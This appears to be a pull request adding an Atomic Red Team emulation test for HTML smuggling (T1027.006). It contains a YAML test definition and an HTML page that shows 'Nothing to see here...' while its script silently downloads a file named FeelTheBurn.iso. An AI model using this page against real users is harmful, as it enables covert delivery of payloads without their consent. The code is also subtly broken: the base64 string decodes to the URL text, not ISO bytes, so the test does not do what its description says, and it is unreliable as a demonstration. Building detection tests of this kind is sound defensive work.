### PR TITLE
t1027-006-html-smuggling

### DIFF
--- a/atomics/T1027.006/T1027.006.yaml
+++ b/atomics/T1027.006/T1027.006.yaml
@@ -1,0 +1,26 @@
+attack_technique: T1027.006
+display_name: HTML Smuggling
+atomic_tests:
+
+- name: HTML Smuggling Remote Payload
+  description: |
+    The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction. 
+    The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
+  supported_platforms:
+  - windows
+  dependencies:
+  - description: |
+      T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
+    prereq_command: |
+      if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
+  executor:
+    command: |
+      PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
+    cleanup_command:
+      $user = [System.Environment]::UserName;
+      Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
+    name: powershell
+    elevation_required: false

--- a/atomics/T1027.006/bin/T1027_006_Remote.html
+++ b/atomics/T1027.006/bin/T1027_006_Remote.html
@@ -1,0 +1,36 @@
+<!-- Based on the template from Stan Hegt: https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
+<html>
+    <head>
+        <title>T1027.006 - HTML Smuggling</title>
+    </head>
+    <body>
+        <p>Nothing to see here...</p>
+
+        <script>
+        function convertFromBase64(base64) {
+            var binary_string = window.atob(base64);
+            var len = binary_string.length;
+            var bytes = new Uint8Array( len );
+            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
+            return bytes.buffer;
+        }
+        //Base64 encoded link to https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso
+        var file ='aHR0cHM6Ly9naXRodWIuY29tL3JlZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9ibG9iL2QwZGFkNjJkYmNhZTljNjBjNTE5MzY4ZTgyYzE5NmEzZGI1NzcwNTUvYXRvbWljcy9UMTU1My4wMDUvYmluL0ZlZWxUaGVCdXJuLmlzbz9yYXc9dHJ1ZQ==';
+        var data = convertFromBase64(file);
+        var blob = new Blob([data], {type: 'octet/stream'});
+        var fileName = 'FeelTheBurn.iso';
+
+        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
+        else {
+            var a = document.createElement('a');
+            document.body.appendChild(a);
+            a.style = 'display: none';
+            var url = window.URL.createObjectURL(blob);
+            a.href = url;
+            a.download = fileName;
+            a.click();
+            window.URL.revokeObjectURL(url);
+        }
+        </script>
+    </body>
+</html>


### PR DESCRIPTION
Add Atomic for HTML smuggling

**Details:**
HTML file that will download an ISO to the current user's Downloads folder.

**Testing:**
![image](https://user-images.githubusercontent.com/78918118/199024128-ad06882c-d5a3-45f9-aae4-722e34d36e64.png)

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->